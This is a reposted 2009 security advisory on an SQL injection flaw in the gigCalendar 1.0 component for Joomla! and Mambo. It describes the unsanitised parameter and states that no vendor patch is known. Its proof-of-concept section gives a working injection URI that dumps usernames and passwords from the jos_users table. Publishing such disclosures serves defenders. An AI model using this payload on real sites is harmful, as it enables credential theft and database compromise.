|
Feeds -
Exploits
|
|
Written by Salvatore Fresta
|
|
Monday, 23 February 2009 20:49 |
Joomla! and Mambo gigCalendar Component 'banddetails.php' SQL Injection Vulnerability
-\\Bugtraq ID: 33859
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Feb 23 2009 12:00AM
-\\Updated: Feb 23 2009 06:07PM
-\\Credit: Salvatore Fresta
-\\Vulnerable: gigCalendar gigCalendar 1.0
-\\Discussion The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
gigCalendar 1.0 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --gigCalendar Homepage http://www.gigcalendar.net (gigCalendar) --gigCalendar Joomla Component 1.0 SQL Injection http://www.securityfocus.com/archive/1/50117 ('Salvatore \"drosophila\" Fresta" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>')
|